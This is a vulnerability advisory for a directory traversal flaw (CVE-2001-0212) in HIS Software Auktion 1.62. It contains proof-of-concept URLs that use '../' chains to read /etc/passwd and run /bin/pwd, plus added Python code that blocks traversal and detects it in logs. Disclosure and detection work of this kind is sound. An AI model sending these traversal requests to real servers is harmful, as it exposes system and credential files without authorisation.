HIS Software Auktion 1.62 Directory Traversal Vulnerability
BID:2367
Info
| Bugtraq ID: | 2367 |
| Class: | Input Validation Error |
| CVE: | CVE-2001-0212 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Feb 12 2001 12:00AM |
| Updated: | Jul 11 2009 04:46AM |
| Credit: | Discovered and posted to Bugtraq by <[email protected]> on Feb 12, 2001. |
| Vulnerable: | HIS Software Auktion 1.62 |
| Not Vulnerable: | |
Discussion
A remote user could gain read access to known files outside of the root directory where HIS Software Auktion 1.62 resides. Requesting a specially crafted URL composed of '../' sequences along with the known filename will disclose the requested file. This vulnerability could also lead to the execution of arbitrary code.
Exploit / POC
The following example has been provided by <[email protected]>:
http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../bin/pwd
http://target/cgi-bin/auktion.pl menue=../../../../../../../../../../../../../etc/passwd
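The defensive counterpart to the requests above, as an added example that is not part of the advisory or of HIS Software's code: a canonicalising path check of the kind a fixed `auktion.pl` would need for its `menue` parameter, plus a detection rule that flags access-log lines carrying a traversal in that parameter. The sample values are constructed from the pattern quoted in the advisory; the helper function names and the log format are assumptions.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Constructed sample values: the traversal quoted in the advisory and a benign menu name.
TRAVERSAL_VALUE = "../../../../../../../../../../../../../etc/passwd"
BENIGN_VALUE = "start"


def resolve_menu_file(base_dir, menue):
    """Return the canonical path of base_dir/<menue>, or None if it escapes base_dir."""
    base = os.path.realpath(base_dir)
    decoded = unquote(menue)               # catch '%2e%2e/' that a raw-string filter misses
    if "\0" in decoded:                    # a NUL would truncate the path in C/Perl
        return None
    candidate = os.path.realpath(os.path.join(base, decoded))
    # realpath resolves '..' and symlinks; whatever is left must still sit under base
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Matches the menue value of an auktion.pl request in a CLF-style access-log line
MENUE_RE = re.compile(r"auktion\.pl\?(?:[^\s\"&]*&)*menue=([^&\s\"]*)")


def is_traversal_request(log_line):
    """Detection rule: True when the decoded menue value contains a '../' or '..\\' step."""
    m = MENUE_RE.search(log_line)
    if not m:
        return False
    value = unquote(unquote(m.group(1)))   # double-decode so encoded variants are not missed
    return "../" in value or "..\\" in value


def demo():
    """Exercise both checks in a throwaway directory holding one legitimate menu file."""
    base = tempfile.mkdtemp()
    with open(os.path.join(base, BENIGN_VALUE), "w") as fh:
        fh.write("menu")
    log_line = ('10.0.0.5 - - [12/Feb/2001:00:00:00 +0000] "GET /cgi-bin/auktion.pl?menue='
                + TRAVERSAL_VALUE + ' HTTP/1.0" 200 1234')   # constructed log line
    return {
        "benign_ok": resolve_menu_file(base, BENIGN_VALUE) is not None,
        "traversal": resolve_menu_file(base, TRAVERSAL_VALUE),
        "log_hit": is_traversal_request(log_line),
    }
```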
Solution / Fix
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
References:
- HIS Software Homepage (HIS Software)